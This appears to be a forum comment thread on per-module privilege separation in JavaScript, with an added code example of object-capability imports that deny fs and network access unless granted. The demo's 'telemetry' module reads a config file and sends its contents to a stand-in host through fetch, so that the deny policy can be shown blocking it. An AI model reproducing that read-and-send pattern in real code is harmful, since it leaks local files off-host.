Comment by vlovich123 a day ago
> instead differentiate between code I consider trusted and code I consider risky.
You’re talking about trying to enforce privilege separation within a single process? For that you’d need capabilities at the language level, and even then I’m skeptical you can really lock things down successfully within a shared memory environment (yes, JS in theory is a VM, but there are so many VM escapes possible that running untrusted code in process seems futile).
I think so, yes. I would like to be able to say "import that module in no-network mode", if that makes sense (or the opposite: default imports to no fs, no network permissions, then grant explicitly).
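The "default deny, grant explicitly" import the reply describes is the object-capability pattern. The following is an added example written for this page, not code from either commenter: modules are factories that receive their authority (here stand-in `fs` and `net` objects, constructed for the example with no real I/O) as a parameter instead of importing it ambiently, and `importWith(factory, { allow })` is an assumed host-side helper that plays the role of "import that module in no-network mode". Ungranted capabilities are replaced by a stub that throws, so a missing grant fails loudly rather than silently reaching the real API.

```javascript
// Added example: object-capability style module loading in plain JavaScript.
// Each "module" is a factory that receives only the capabilities it was
// granted; the host's default is deny-all and grants are explicit per import.

// Constructed stand-ins for the real fs / network APIs (no real I/O happens).
const realCapabilities = Object.freeze({
  fs: Object.freeze({ readFile: (path) => `<contents of ${path}>` }),
  net: Object.freeze({ fetch: (url) => `<response from ${url}>` }),
});

// Build the capability bag a module sees. Every known capability name is
// present, but any capability not in `granted` is a proxy whose property
// access throws, so an undeclared dependency surfaces at the call site.
function grant(granted) {
  const bag = {};
  for (const name of Object.keys(realCapabilities)) {
    if (granted.includes(name)) {
      bag[name] = realCapabilities[name];
    } else {
      bag[name] = new Proxy(Object.freeze({}), {
        get(_target, prop) {
          throw new Error(`capability '${name}.${String(prop)}' not granted`);
        },
      });
    }
  }
  return Object.freeze(bag);
}

// Hypothetical host helper: instantiate a module with an explicit allow list.
// importWith(mod, { allow: ['fs'] }) is "import mod in no-network mode".
function importWith(factory, { allow = [] } = {}) {
  return factory(grant(allow));
}

// Two constructed modules written in capability style: they take their
// authority as a parameter rather than reaching for ambient globals.
const configLoader = (caps) => ({
  load: (path) => caps.fs.readFile(path),
});

const telemetry = (caps) => ({
  // Reads a file and tries to send its contents off-host: the shape a
  // reviewer wants a no-network import to stop.
  report: (path) =>
    caps.net.fetch(`https://example.invalid/?d=${encodeURIComponent(caps.fs.readFile(path))}`),
});

// Host policy: configLoader gets fs only; telemetry is imported with net withheld.
function runDemo() {
  const cfg = importWith(configLoader, { allow: ['fs'] });
  const tel = importWith(telemetry, { allow: ['fs'] }); // no 'net' grant

  const results = { configRead: cfg.load('/etc/app.conf'), telemetryBlocked: null };
  try {
    tel.report('/etc/app.conf');
  } catch (e) {
    // `caps.net.fetch` is resolved before readFile runs, so nothing is read.
    results.telemetryBlocked = e.message;
  }
  return results;
}
```

This is a language-level discipline, and it only holds if the module cannot obtain the same authority by another route: `require`, `import()`, `globalThis`, and process-wide APIs must also be unreachable from the module (which is what compartment/SES-style loaders and the "no-fs, no-network by default" import model aim to provide). It does nothing about the shared-memory and VM-escape concern raised above; in-process capabilities bound what well-behaved or merely buggy code can touch, not what a runtime exploit can.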